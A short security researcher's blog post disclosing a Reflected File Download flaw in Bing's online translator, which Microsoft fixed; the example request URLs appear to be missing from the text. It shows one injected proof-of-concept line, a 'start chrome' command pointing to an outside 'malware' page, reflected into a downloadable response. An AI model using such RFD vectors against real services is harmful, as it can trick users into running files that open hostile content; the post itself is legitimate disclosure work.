David Sopas – Web Security Researcher

January 19, 2016 at 2:30 pm

Bing Reflected File Download

Bing Reflected File Download

When using Bing online translator I noticed a XHR request on my browser that caught my attention:


On which reflected on the screen:


As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:


On which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

Advisories # , , ,
Share: / / /

Leave a Reply